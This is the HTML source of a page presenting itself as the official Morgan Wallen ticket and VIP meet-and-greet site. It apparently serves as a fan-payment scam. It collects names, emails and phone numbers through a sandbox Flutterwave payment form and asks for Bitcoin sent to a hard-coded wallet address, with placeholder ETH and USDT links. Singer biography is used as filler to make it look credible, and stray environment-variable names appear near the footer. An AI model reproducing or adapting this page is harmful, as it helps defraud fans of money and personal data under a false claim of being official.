<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Morgan Wallen Official Ticket & Fan Site</title>
<style>
  body { font-family: Arial, sans-serif; background: url('assets/morgan_wallen_bg.jpg') no-repeat center center fixed; background-size: cover; color: #fff; margin:0; padding:0; }
  .overlay { background-color: rgba(0,0,0,0.75); min-height: 100vh; padding: 20px; }
  .container { max-width: 1000px; margin: auto; }
  h1,h2,h3{text-align:center;margin:10px 0;} h2{margin-top:40px;}
  p,li{font-size:1em; line-height:1.5em;} ul{list-style:none; padding:0;}
  .section {margin-bottom:50px; background-color: rgba(255,255,255,0.05); padding:20px; border-radius:10px;}
  .payment,.crypto{text-align:center;margin-top:20px;}
  .crypto a{display:inline-block;margin:5px 10px;color:#ffcc00;text-decoration:underline;}
  input,button{padding:10px;margin:5px;} .btn{background-color:#ff9900; border:none; cursor:pointer;}
  .small{font-size:0.85em;}
</style>
</head>
<body>
<div class="overlay">
<div class="container">
<h1>🎟️ Morgan Wallen — Tickets & VIP Meet-and-Greet</h1>

<div class="section payment">
<h2>Pay with Flutterwave</h2>
<form action="https://sandbox.flutterwave.com/pay/qrslug-118314-m6bypz7tchhb" method="GET" target="_blank">
<input type="text" name="amount" placeholder="Enter Amount" />
<input type="text" name="fullname" placeholder="Full Name" required />
<input type="email" name="email" placeholder="Email" required />
<input type="tel" name="phone" placeholder="Phone Number" required />
<button type="submit" class="btn">Pay Now</button>
</form>
</div>

<div class="section crypto">
<h2>Pay with Crypto</h2>
<a href="https://link.trustwallet.com/send?asset=c0&address=bc1q2lznq5f6uaglgfyump4ad2g9lfuyks0vwexyj2" target="_blank">Bitcoin (BTC)</a>
<a href="https://link.trustwallet.com/send?asset=eth&address=YOUR_ETH_ADDRESS" target="_blank">Ethereum (ETH)</a>
<a href="https://link.trustwallet.com/send?asset=usdt&address=YOUR_USDT_ADDRESS" target="_blank">USDT</a>
</div>

<div class="section">
<h2>Basic Info</h2>
<p><strong>Full Name:</strong> Morgan Cole Wallen</p>
<p><strong>Born:</strong> May 13, 1993, Sneedville, Tennessee, U.S.</p>
<p><strong>Genres:</strong> Country, Country-Pop</p>
<p><strong>Instruments:</strong> Vocals, Guitar, Piano, Violin (early lessons)</p>
<p><strong>Labels:</strong> Panacea, Big Loud, Republic/Mercury</p>
</div>

<div class="section">
<h2>Early Life & Background</h2>
<ul>
<li>Raised by parents Tommy (former church pastor) & Lesli Wallen</li>
<li>Sang in church from age 3, learned piano & violin</li>
<li>Played baseball in high school; pivoted to music after arm injury</li>
</ul>
</div>

<div class="section">
<h2>Career Milestones</h2>
<ul>
<li><strong>2014:</strong> Auditioned for The Voice (did not win)</li>
<li><strong>2015:</strong> Released EP <em>Stand Alone</em></li>
<li><strong>2018:</strong> Debut album <em>If I Know Me</em> (#10 Billboard 200, #1 US Top Country Albums)</li>
<li><strong>2021:</strong> Dangerous: The Double Album – commercial breakout</li>
<li><strong>2023:</strong> One Thing at a Time – all 36 tracks charted on Billboard Hot 100</li>
<li><strong>2025:</strong> I’m the Problem – 37-song album featuring Post Malone, Tate McRae, Eric Church</li>
</ul>
</div>

<div class="section">
<h2>Discography Highlights</h2>
<ul>
<li><strong>If I Know Me (2018):</strong> "The Way I Talk," "Up Down," "Whiskey Glasses," "Chasin’ You"</li>
<li><strong>Dangerous: The Double Album (2021):</strong> "Wasted On You," "7 Summers," "Sand In My Boots"</li>
<li><strong>One Thing at a Time (2023):</strong> "Last Night," "You Proof," "Thought You Should Know"</li>
<li><strong>I’m the Problem (2025):</strong> features Post Malone, Tate McRae, Eric Church</li>
</ul>
</div>

<div class="section">
<h2>Tour & Meet-and-Greet</h2>
<ul>
<li>One Night at a Time World Tour (2023) – highest-selling country tour</li>
<li>I’m the Problem Tour (2025) – stadium dates across U.S. & Canada</li>
<li>VIP packages include early entry, premium merchandise, and meet-and-greet moments (check Ticketmaster per show)</li>
</ul>
</div>

<div class="section">
<h2>Awards & Recognitions</h2>
<ul>
<li>CMA Entertainer of the Year 2024</li>
<li>Multiple ACM, CMA, Billboard nominations & wins</li>
<li>Grammy nominations via collaborations (limited)</li>
</ul>
</div>

<div class="section small">
<p><strong>Environment Variables:</strong></p>
<p>Algolia: <code>ALGOLIA_BASE_URL, ALGOLIA_API_KEY, ALGOLIA_DISABLED</code></p>
<p>Applitools: <code>APPLITOOLS_API_KEY</code></p>
</div>

<p style="text-align:center; margin-top:40px;">&copy; 2025 Morgan Wallen Official Ticket Site</p>
</div>
</div>
</body>
</html>
